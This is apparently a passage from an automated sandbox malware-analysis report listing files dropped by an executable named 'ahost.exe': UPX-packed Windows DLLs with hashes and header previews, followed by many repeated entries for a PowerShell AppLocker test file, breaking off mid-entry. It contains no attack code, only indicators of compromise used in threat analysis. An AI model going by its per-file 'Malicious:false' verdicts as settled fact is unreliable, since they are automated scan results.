                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                            MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                            SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                            SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                            SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\ahost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):267024
                                                                                                                                                                                                                            Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                            MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                            SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                            SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                            SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
